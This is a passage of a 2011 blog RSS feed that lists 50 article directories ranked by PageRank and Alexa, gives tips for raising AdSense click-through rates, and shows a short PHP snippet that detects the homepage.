<td style="color: #cc0000;" align="center"></td>
</tr>
<tr bgcolor="#EEEEEE">
<td align="right">28.</td>
<td align="left"><a href="http://www.triond.com" target="_blank">triond.com</a></td>
<td align="right">5,728</td>
<td align="center">5</td>
<td style="color: #cc0000;" align="center"></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right">29.</td>
<td align="left"><a href="http://www.selfseo.com" target="_blank">selfseo.com</a></td>
<td align="right">5,777</td>
<td align="center">5</td>
<td style="color: #cc0000;" align="center"></td>
</tr>
<tr bgcolor="#EEEEEE">
<td align="right">30.</td>
<td align="left"><a href="http://www.articledashboard.com" target="_blank">articledashboard.com</a> <span style="color: #cc0000;">$</span></td>
<td align="right">5,780</td>
<td align="center">5</td>
<td style="color: #cc0000;" align="center"></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right">31.</td>
<td align="left"><a href="http://www.articlerich.com" target="_blank">articlerich.com</a></td>
<td align="right">6,461</td>
<td align="center">4</td>
<td style="color: #cc0000;" align="center"></td>
</tr>
<tr bgcolor="#EEEEEE">
<td align="right">32.</td>
<td align="left"><a href="http://www.web-source.net" target="_blank">web-source.net</a></td>
<td align="right">7,289</td>
<td align="center">3</td>
<td style="color: #cc0000;" align="center"></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right">33.</td>
<td align="left"><a href="http://www.articlecity.com" target="_blank">articlecity.com</a></td>
<td align="right">7,330</td>
<td align="center">5</td>
<td style="color: #cc0000;" align="center"></td>
</tr>
<tr bgcolor="#EEEEEE">
<td align="right">34.</td>
<td align="left"><a href="http://www.isnare.com" target="_blank">isnare.com</a></td>
<td align="right">7,447</td>
<td align="center">5</td>
<td style="color: #cc0000;" align="center"></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right">35.</td>
<td align="left"><a href="http://www.articleclick.com" target="_blank">articleclick.com</a></td>
<td align="right">7,995</td>
<td align="center">4</td>
<td style="color: #cc0000;" align="center"></td>
</tr>
<tr bgcolor="#EEEEEE">
<td align="right">36.</td>
<td align="left"><a href="http://www.articleblast.com" target="_blank">articleblast.com</a></td>
<td align="right">10,116</td>
<td align="center">5</td>
<td style="color: #cc0000;" align="center"></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right">37.</td>
<td align="left"><a href="http://www.articlecube.com" target="_blank">articlecube.com</a></td>
<td align="right">10,459</td>
<td align="center">4</td>
<td style="color: #cc0000;" align="center"></td>
</tr>
<tr bgcolor="#EEEEEE">
<td align="right">38.</td>
<td align="left"><a href="http://www.articlecompilation.com" target="_blank">articlecompilation.com</a></td>
<td align="right">10,495</td>
<td align="center">4</td>
<td style="color: #cc0000;" align="center"></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right">39.</td>
<td align="left"><a href="http://www.xomba.com" target="_blank">xomba.com</a></td>
<td align="right">10,548</td>
<td align="center">4</td>
<td style="color: #cc0000;" align="center">NF!</td>
</tr>
<tr bgcolor="#EEEEEE">
<td align="right">40.</td>
<td align="left"><a href="http://www.articlesfactory.com" target="_blank">articlesfactory.com</a></td>
<td align="right">10,571</td>
<td align="center">4</td>
<td style="color: #cc0000;" align="center"></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right">41.</td>
<td align="left"><a href="http://www.submityourarticle.com/articles/" target="_blank">submityourarticle.com/articles/</a> <span style="color: #cc0000;">$</span></td>
<td align="right">10,668</td>
<td align="center">4</td>
<td style="color: #cc0000;" align="center"></td>
</tr>
<tr bgcolor="#EEEEEE">
<td align="right">42.</td>
<td align="left"><a href="http://www.snipsly.com" target="_blank">snipsly.com</a></td>
<td align="right">10,768</td>
<td align="center">4</td>
<td style="color: #cc0000;" align="center"></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right">43.</td>
<td align="left"><a href="http://www.articletrader.com" target="_blank">articletrader.com</a></td>
<td align="right">10,937</td>
<td align="center">5</td>
<td style="color: #cc0000;" align="center"></td>
</tr>
<tr bgcolor="#EEEEEE">
<td align="right">44.</td>
<td align="left"><a href="http://www.searchwarp.com" target="_blank">searchwarp.com</a></td>
<td align="right">10,957</td>
<td align="center">5</td>
<td style="color: #cc0000;" align="center">NF!</td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right">45.</td>
<td align="left"><a href="http://www.upublish.info" target="_blank">upublish.info</a></td>
<td align="right">11,313</td>
<td align="center">4</td>
<td style="color: #cc0000;" align="center"></td>
</tr>
<tr bgcolor="#EEEEEE">
<td align="right">46.</td>
<td align="left"><a href="http://www.articleslash.net" target="_blank">articleslash.net</a></td>
<td align="right">12,276</td>
<td align="center">5</td>
<td style="color: #cc0000;" align="center"></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right">47.</td>
<td align="left"><a href="http://www.a1articles.com" target="_blank">a1articles.com</a></td>
<td align="right">12,296</td>
<td align="center">5</td>
<td style="color: #cc0000;" align="center">NF!</td>
</tr>
<tr bgcolor="#EEEEEE">
<td align="right">48.</td>
<td align="left"><a href="http://www.informationbible.com" target="_blank">informationbible.com</a></td>
<td align="right">12,962</td>
<td align="center">2</td>
<td style="color: #cc0000;" align="center"></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right">49.</td>
<td align="left"><a href="http://www.EvanCarmichael.com" target="_blank">EvanCarmichael.com</a></td>
<td align="right">13,282</td>
<td align="center">5</td>
<td style="color: #cc0000;" align="center"></td>
</tr>
<tr bgcolor="#EEEEEE">
<td align="right">50.</td>
<td align="left"><a href="http://www.articlefeeder.com" target="_blank">articlefeeder.com</a></td>
<td align="right">14,128</td>
<td align="center">3</td>
<td style="color: #cc0000;" align="center"></td>
</tr>
</tbody>
</table>
<p>This list should really help kick start you on your path to article submission greatness!</p>


<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-caring-old">
<ul class="socials">
		<li class="shr-delicious">
			<a href="http://www.shareaholic.com/api/share/?title=50+top+Article+directories+based+on+PR+and+Alexa&amp;link=http://www.timbystechtalk.com/index.php/2011/08/22/50-top-article-directories-based-on-pr-and-alexa/&amp;notes=If%20you%20have%20been%20in%20the%20SEO%20game%20for%20more%20than%20five%20minutes%20you%20have%20no%20doubt%20heard%20about%20the%20wonders%20of%20Article%20Directories.%20The%20first%20directory%20that%20comes%20to%20mind%20for%20most%20online%20guru%27s%20is%20%22ezine%20articles%22%20and%20whilst%20this%20is%20a%20fantastic%20directory%20%28that%20google%20really%20loves%29%20there%20are%20many%20other%20suc&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=2&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-digg">
			<a href="http://www.shareaholic.com/api/share/?title=50+top+Article+directories+based+on+PR+and+Alexa&amp;link=http://www.timbystechtalk.com/index.php/2011/08/22/50-top-article-directories-based-on-pr-and-alexa/&amp;notes=If%20you%20have%20been%20in%20the%20SEO%20game%20for%20more%20than%20five%20minutes%20you%20have%20no%20doubt%20heard%20about%20the%20wonders%20of%20Article%20Directories.%20The%20first%20directory%20that%20comes%20to%20mind%20for%20most%20online%20guru%27s%20is%20%22ezine%20articles%22%20and%20whilst%20this%20is%20a%20fantastic%20directory%20%28that%20google%20really%20loves%29%20there%20are%20many%20other%20suc&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=3&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Digg this!">Digg this!</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.shareaholic.com/api/share/?title=50+top+Article+directories+based+on+PR+and+Alexa&amp;link=http://www.timbystechtalk.com/index.php/2011/08/22/50-top-article-directories-based-on-pr-and-alexa/&amp;notes=If%20you%20have%20been%20in%20the%20SEO%20game%20for%20more%20than%20five%20minutes%20you%20have%20no%20doubt%20heard%20about%20the%20wonders%20of%20Article%20Directories.%20The%20first%20directory%20that%20comes%20to%20mind%20for%20most%20online%20guru%27s%20is%20%22ezine%20articles%22%20and%20whilst%20this%20is%20a%20fantastic%20directory%20%28that%20google%20really%20loves%29%20there%20are%20many%20other%20suc&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=5&amp;tags=&amp;ctype=" rel="nofollow" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-googlebookmarks">
			<a href="http://www.shareaholic.com/api/share/?title=50+top+Article+directories+based+on+PR+and+Alexa&amp;link=http://www.timbystechtalk.com/index.php/2011/08/22/50-top-article-directories-based-on-pr-and-alexa/&amp;notes=If%20you%20have%20been%20in%20the%20SEO%20game%20for%20more%20than%20five%20minutes%20you%20have%20no%20doubt%20heard%20about%20the%20wonders%20of%20Article%20Directories.%20The%20first%20directory%20that%20comes%20to%20mind%20for%20most%20online%20guru%27s%20is%20%22ezine%20articles%22%20and%20whilst%20this%20is%20a%20fantastic%20directory%20%28that%20google%20really%20loves%29%20there%20are%20many%20other%20suc&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=74&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Add this to Google Bookmarks">Add this to Google Bookmarks</a>
		</li>
		<li class="shr-linkedin">
			<a href="http://www.shareaholic.com/api/share/?title=50+top+Article+directories+based+on+PR+and+Alexa&amp;link=http://www.timbystechtalk.com/index.php/2011/08/22/50-top-article-directories-based-on-pr-and-alexa/&amp;notes=If%20you%20have%20been%20in%20the%20SEO%20game%20for%20more%20than%20five%20minutes%20you%20have%20no%20doubt%20heard%20about%20the%20wonders%20of%20Article%20Directories.%20The%20first%20directory%20that%20comes%20to%20mind%20for%20most%20online%20guru%27s%20is%20%22ezine%20articles%22%20and%20whilst%20this%20is%20a%20fantastic%20directory%20%28that%20google%20really%20loves%29%20there%20are%20many%20other%20suc&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=88&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on LinkedIn">Share this on LinkedIn</a>
		</li>
		<li class="shr-reddit">
			<a href="http://www.shareaholic.com/api/share/?title=50+top+Article+directories+based+on+PR+and+Alexa&amp;link=http://www.timbystechtalk.com/index.php/2011/08/22/50-top-article-directories-based-on-pr-and-alexa/&amp;notes=If%20you%20have%20been%20in%20the%20SEO%20game%20for%20more%20than%20five%20minutes%20you%20have%20no%20doubt%20heard%20about%20the%20wonders%20of%20Article%20Directories.%20The%20first%20directory%20that%20comes%20to%20mind%20for%20most%20online%20guru%27s%20is%20%22ezine%20articles%22%20and%20whilst%20this%20is%20a%20fantastic%20directory%20%28that%20google%20really%20loves%29%20there%20are%20many%20other%20suc&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=40&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on Reddit">Share this on Reddit</a>
		</li>
		<li class="shr-sphinn">
			<a href="http://www.shareaholic.com/api/share/?title=50+top+Article+directories+based+on+PR+and+Alexa&amp;link=http://www.timbystechtalk.com/index.php/2011/08/22/50-top-article-directories-based-on-pr-and-alexa/&amp;notes=If%20you%20have%20been%20in%20the%20SEO%20game%20for%20more%20than%20five%20minutes%20you%20have%20no%20doubt%20heard%20about%20the%20wonders%20of%20Article%20Directories.%20The%20first%20directory%20that%20comes%20to%20mind%20for%20most%20online%20guru%27s%20is%20%22ezine%20articles%22%20and%20whilst%20this%20is%20a%20fantastic%20directory%20%28that%20google%20really%20loves%29%20there%20are%20many%20other%20suc&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=100&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Sphinn this on Sphinn">Sphinn this on Sphinn</a>
		</li>
		<li class="shr-stumbleupon">
			<a href="http://www.shareaholic.com/api/share/?title=50+top+Article+directories+based+on+PR+and+Alexa&amp;link=http://www.timbystechtalk.com/index.php/2011/08/22/50-top-article-directories-based-on-pr-and-alexa/&amp;notes=If%20you%20have%20been%20in%20the%20SEO%20game%20for%20more%20than%20five%20minutes%20you%20have%20no%20doubt%20heard%20about%20the%20wonders%20of%20Article%20Directories.%20The%20first%20directory%20that%20comes%20to%20mind%20for%20most%20online%20guru%27s%20is%20%22ezine%20articles%22%20and%20whilst%20this%20is%20a%20fantastic%20directory%20%28that%20google%20really%20loves%29%20there%20are%20many%20other%20suc&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=38&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="shr-twitter">
			<a href="http://www.shareaholic.com/api/share/?title=50+top+Article+directories+based+on+PR+and+Alexa&amp;link=http://www.timbystechtalk.com/index.php/2011/08/22/50-top-article-directories-based-on-pr-and-alexa/&amp;notes=If%20you%20have%20been%20in%20the%20SEO%20game%20for%20more%20than%20five%20minutes%20you%20have%20no%20doubt%20heard%20about%20the%20wonders%20of%20Article%20Directories.%20The%20first%20directory%20that%20comes%20to%20mind%20for%20most%20online%20guru%27s%20is%20%22ezine%20articles%22%20and%20whilst%20this%20is%20a%20fantastic%20directory%20%28that%20google%20really%20loves%29%20there%20are%20many%20other%20suc&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=%24%7Btitle%7D+-+%24%7Bshort_link%7D&amp;service=7&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
</ul><div style="clear: both;"></div><div class="shr-getshr" style="visibility:hidden;font-size:10px !important"><a target="_blank" href="http://www.shareaholic.com/?src=pub">Get Shareaholic</a></div><div style="clear: both;"></div></div>

]]></content:encoded>
			<wfw:commentRss>http://www.timbystechtalk.com/index.php/2011/08/22/50-top-article-directories-based-on-pr-and-alexa/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Getting more from adsense sites</title>
		<link>http://www.timbystechtalk.com/index.php/2011/06/13/getting-more-from-adsense-sites/</link>
		<comments>http://www.timbystechtalk.com/index.php/2011/06/13/getting-more-from-adsense-sites/#comments</comments>
		<pubDate>Mon, 13 Jun 2011 12:22:03 +0000</pubDate>
		<dc:creator>Timby</dc:creator>
				<category><![CDATA[Money Online]]></category>
		<category><![CDATA[adsense optimization]]></category>
		<category><![CDATA[adsense tips]]></category>

		<guid isPermaLink="false">http://www.timbystechtalk.com/?p=367</guid>
		<description><![CDATA[Sometimes adsense websites can just be plain frustrating. Once you achieve some good natural search engine traffic and you are seeing consistent unique visitors reading your well written content you will probably start to consider optimizing your websites revenue. Adsense is usually ok but turning that CTR fromj 1% to 3% really can triple your [...]]]></description>
			<content:encoded><![CDATA[<p>Sometimes adsense websites can just be plain frustrating. Once you achieve some good natural search engine traffic and you are seeing consistent unique visitors reading your well written content you will probably start to consider optimizing your websites revenue. Adsense is usually ok but turning that CTR fromj 1% to 3% really can triple your revenue from your site. So what are some strategies for improving adsense CTR and earnings?</p>
<p><strong>Well Structured Page</strong></p>
<p>By this I mean the entire page structure where your ads are showing. Good CTR and good earnings all start with excellent, captivating, interesting website copy focusing on good keywords. Pair with this a good page title, good use of H tags,  and include an image or 2 with nice alt tags. Lay a good foundation so google knows what your content is about and can serve you the highest paying ads.</p>
<p>Captivating keyword focused content will also ensure that you will mainly attract quality website traffic. This is also very important because if the traffic you are receiving isn&#8217;t actually interested in your content there is a good chance they won&#8217;t be interested in your advertising either and will just hit the back button or close the window.</p>
<p><strong>Ad positioning</strong></p>
<p>Seasoned adsense users already know what image I am going to show next&#8230;but here it is anyway:</p>
<p><a href="http://www.timbystechtalk.com/wp-content/uploads/2011/06/adsense_ad_placements.jpg" target="_blank"><img class="aligncenter size-medium wp-image-368" title="adsense_ad_placements" src="http://www.timbystechtalk.com/wp-content/uploads/2011/06/adsense_ad_placements-225x300.jpg" alt="Adsense Ad Placements" width="225" height="300" /></a>This is adsense&#8217;s official advertising &#8220;heat map&#8221; which shows us the positions that google considers to give the best CTR for your ads. Google&#8217;s page <a href="https://www.google.com/support/adsense/bin/answer.py?answer=17954" target="_blank">here</a> goes more into this! Generally I have found that Ad position really requires a bit of experimentation as each page tends to perform differently. Within the content and just after the content seems to work well in general cases but there are sites where anything below the fold just won&#8217;t perform. A simple change of placing an ad inside an article sent my CTR from 1% up to 3.5% over night. No change in the content, just a 5 minute change to my website yielded a fantastic result.</p>
<p><strong>Ad Colors</strong></p>
<p>This one surprised me most. I once had a site that was barely scraping 1% ctr but I had what I considered great advertising positions for the content. The ad&#8217;s matched the website perfectly, down to the font type but it just simply didn&#8217;t perform in the way I had hoped. So I tried something crazy (generally advised against anyway) and changed my ad colors to vibrant green which contrasted quite strongly against the regular grey background. My CTR jumped 1% right away.</p>
<p>The point I&#8217;m trying to make here is that sometimes if you make your ads stand out more you will actually improve the chances of getting clicks. Having said this in general cases  you will want your advertising to blend in with your content. Match the background colors, font sizes, types and colors and whack your ads in locations of your website that emulate the linking structures of your site if possible.</p>
<p><strong>Bad sites mean more clicks?</strong></p>
<p>Some people also believe that a bad site leads to more clicks. The idea behind this? If a website is ugly and hard to use the user will naturally want to get out of there as soon as possible. Pair this with some well positioned relevant advertising and users will most likely click on the ads to get away from the monstrosity. A classic example of this is the adsense giant plentyoffish.com which claims to have once made $10,000 in adsense in just 1 day.</p>
<p>I wouldn&#8217;t really condone going down this road but it is something to consider for those internet marketing philosophers!</p>
<p><strong>Benefits</strong></p>
<p>Ad optimization really is an important part of running an adsense website. When I started in the game I didn&#8217;t spend the time on this step until a year into developing sites. When I finally took 10 minutes to reevaluate my ad positions I actually kicked myself because I increased my revenue by around $5 per day just by making a few simple changes.</p>
<p>Spend some time experimenting with your ads and you will unleash the full potential of your sites!</p>


<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-caring-old">
<ul class="socials">
		<li class="shr-delicious">
			<a href="http://www.shareaholic.com/api/share/?title=Getting+more+from+adsense+sites&amp;link=http://www.timbystechtalk.com/index.php/2011/06/13/getting-more-from-adsense-sites/&amp;notes=Sometimes%20adsense%20websites%20can%20just%20be%20plain%20frustrating.%20Once%20you%20achieve%20some%20good%20natural%20search%20engine%20traffic%20and%20you%20are%20seeing%20consistent%20unique%20visitors%20reading%20your%20well%20written%20content%20you%20will%20probably%20start%20to%20consider%20optimizing%20your%20websites%20revenue.%20Adsense%20is%20usually%20ok%20but%20turning%20t&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=2&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-digg">
			<a href="http://www.shareaholic.com/api/share/?title=Getting+more+from+adsense+sites&amp;link=http://www.timbystechtalk.com/index.php/2011/06/13/getting-more-from-adsense-sites/&amp;notes=Sometimes%20adsense%20websites%20can%20just%20be%20plain%20frustrating.%20Once%20you%20achieve%20some%20good%20natural%20search%20engine%20traffic%20and%20you%20are%20seeing%20consistent%20unique%20visitors%20reading%20your%20well%20written%20content%20you%20will%20probably%20start%20to%20consider%20optimizing%20your%20websites%20revenue.%20Adsense%20is%20usually%20ok%20but%20turning%20t&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=3&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Digg this!">Digg this!</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.shareaholic.com/api/share/?title=Getting+more+from+adsense+sites&amp;link=http://www.timbystechtalk.com/index.php/2011/06/13/getting-more-from-adsense-sites/&amp;notes=Sometimes%20adsense%20websites%20can%20just%20be%20plain%20frustrating.%20Once%20you%20achieve%20some%20good%20natural%20search%20engine%20traffic%20and%20you%20are%20seeing%20consistent%20unique%20visitors%20reading%20your%20well%20written%20content%20you%20will%20probably%20start%20to%20consider%20optimizing%20your%20websites%20revenue.%20Adsense%20is%20usually%20ok%20but%20turning%20t&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=5&amp;tags=&amp;ctype=" rel="nofollow" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-googlebookmarks">
			<a href="http://www.shareaholic.com/api/share/?title=Getting+more+from+adsense+sites&amp;link=http://www.timbystechtalk.com/index.php/2011/06/13/getting-more-from-adsense-sites/&amp;notes=Sometimes%20adsense%20websites%20can%20just%20be%20plain%20frustrating.%20Once%20you%20achieve%20some%20good%20natural%20search%20engine%20traffic%20and%20you%20are%20seeing%20consistent%20unique%20visitors%20reading%20your%20well%20written%20content%20you%20will%20probably%20start%20to%20consider%20optimizing%20your%20websites%20revenue.%20Adsense%20is%20usually%20ok%20but%20turning%20t&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=74&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Add this to Google Bookmarks">Add this to Google Bookmarks</a>
		</li>
		<li class="shr-linkedin">
			<a href="http://www.shareaholic.com/api/share/?title=Getting+more+from+adsense+sites&amp;link=http://www.timbystechtalk.com/index.php/2011/06/13/getting-more-from-adsense-sites/&amp;notes=Sometimes%20adsense%20websites%20can%20just%20be%20plain%20frustrating.%20Once%20you%20achieve%20some%20good%20natural%20search%20engine%20traffic%20and%20you%20are%20seeing%20consistent%20unique%20visitors%20reading%20your%20well%20written%20content%20you%20will%20probably%20start%20to%20consider%20optimizing%20your%20websites%20revenue.%20Adsense%20is%20usually%20ok%20but%20turning%20t&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=88&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on LinkedIn">Share this on LinkedIn</a>
		</li>
		<li class="shr-reddit">
			<a href="http://www.shareaholic.com/api/share/?title=Getting+more+from+adsense+sites&amp;link=http://www.timbystechtalk.com/index.php/2011/06/13/getting-more-from-adsense-sites/&amp;notes=Sometimes%20adsense%20websites%20can%20just%20be%20plain%20frustrating.%20Once%20you%20achieve%20some%20good%20natural%20search%20engine%20traffic%20and%20you%20are%20seeing%20consistent%20unique%20visitors%20reading%20your%20well%20written%20content%20you%20will%20probably%20start%20to%20consider%20optimizing%20your%20websites%20revenue.%20Adsense%20is%20usually%20ok%20but%20turning%20t&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=40&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on Reddit">Share this on Reddit</a>
		</li>
		<li class="shr-sphinn">
			<a href="http://www.shareaholic.com/api/share/?title=Getting+more+from+adsense+sites&amp;link=http://www.timbystechtalk.com/index.php/2011/06/13/getting-more-from-adsense-sites/&amp;notes=Sometimes%20adsense%20websites%20can%20just%20be%20plain%20frustrating.%20Once%20you%20achieve%20some%20good%20natural%20search%20engine%20traffic%20and%20you%20are%20seeing%20consistent%20unique%20visitors%20reading%20your%20well%20written%20content%20you%20will%20probably%20start%20to%20consider%20optimizing%20your%20websites%20revenue.%20Adsense%20is%20usually%20ok%20but%20turning%20t&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=100&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Sphinn this on Sphinn">Sphinn this on Sphinn</a>
		</li>
		<li class="shr-stumbleupon">
			<a href="http://www.shareaholic.com/api/share/?title=Getting+more+from+adsense+sites&amp;link=http://www.timbystechtalk.com/index.php/2011/06/13/getting-more-from-adsense-sites/&amp;notes=Sometimes%20adsense%20websites%20can%20just%20be%20plain%20frustrating.%20Once%20you%20achieve%20some%20good%20natural%20search%20engine%20traffic%20and%20you%20are%20seeing%20consistent%20unique%20visitors%20reading%20your%20well%20written%20content%20you%20will%20probably%20start%20to%20consider%20optimizing%20your%20websites%20revenue.%20Adsense%20is%20usually%20ok%20but%20turning%20t&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=38&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="shr-twitter">
			<a href="http://www.shareaholic.com/api/share/?title=Getting+more+from+adsense+sites&amp;link=http://www.timbystechtalk.com/index.php/2011/06/13/getting-more-from-adsense-sites/&amp;notes=Sometimes%20adsense%20websites%20can%20just%20be%20plain%20frustrating.%20Once%20you%20achieve%20some%20good%20natural%20search%20engine%20traffic%20and%20you%20are%20seeing%20consistent%20unique%20visitors%20reading%20your%20well%20written%20content%20you%20will%20probably%20start%20to%20consider%20optimizing%20your%20websites%20revenue.%20Adsense%20is%20usually%20ok%20but%20turning%20t&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=%24%7Btitle%7D+-+%24%7Bshort_link%7D&amp;service=7&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
</ul><div style="clear: both;"></div><div class="shr-getshr" style="visibility:hidden;font-size:10px !important"><a target="_blank" href="http://www.shareaholic.com/?src=pub">Get Shareaholic</a></div><div style="clear: both;"></div></div>

]]></content:encoded>
			<wfw:commentRss>http://www.timbystechtalk.com/index.php/2011/06/13/getting-more-from-adsense-sites/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>PHP detect homepage</title>
		<link>http://www.timbystechtalk.com/index.php/2011/06/04/php-detect-homepage/</link>
		<comments>http://www.timbystechtalk.com/index.php/2011/06/04/php-detect-homepage/#comments</comments>
		<pubDate>Sat, 04 Jun 2011 03:38:16 +0000</pubDate>
		<dc:creator>Timby</dc:creator>
				<category><![CDATA[PHP]]></category>
		<category><![CDATA[php check homepage]]></category>

		<guid isPermaLink="false">http://www.timbystechtalk.com/?p=358</guid>
		<description><![CDATA[I won&#8217;t lie, I am mainly writing this blog post for me as I always seem to forget this simple code for some reason! I also thought there was a good chance others may be in the same boat as well so that sealed the deal. This script is particularly useful if you have included [...]]]></description>
			<content:encoded><![CDATA[<p>I won&#8217;t lie, I am mainly writing this blog post for me as I always seem to forget this simple code for some reason! I also thought there was a good chance others may be in the same boat as well so that sealed the deal.</p>
<p>This script is particularly useful if you have included pages across your entire website (such as a navigation) and wish to include something in this section for the homepage only (such as a special advertisement or link).</p>
<p>Here is a simple php script to detect if you are currently on the homepage:</p>
<div class="codesnip-container" >
<div class="php codesnip" style="font-family:monospace;"><span class="kw2">&lt;?php</span><br />
<span class="kw1">if</span> <span class="br0">&#40;</span><span class="re0">$_SERVER</span><span class="br0">&#91;</span><span class="st_h">&#8216;REQUEST_URI&#8217;</span><span class="br0">&#93;</span> <span class="sy0">==</span> <span class="st0">&quot;/&quot;</span><span class="br0">&#41;</span> <span class="br0">&#123;</span><br />
&nbsp; &nbsp; &nbsp; <span class="kw1">echo</span> <span class="st0">&quot;Homepage!&quot;</span><span class="sy0">;</span><br />
<span class="br0">&#125;</span> <span class="kw1">else</span> <span class="br0">&#123;</span><br />
&nbsp; &nbsp; &nbsp;<span class="kw1">echo</span> <span class="st0">&quot;Not homepage!&quot;</span><span class="sy0">;</span><br />
<span class="br0">&#125;</span><br />
<span class="sy1">?&gt;</span></div>
</div>


<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-caring-old">
<ul class="socials">
		<li class="shr-delicious">
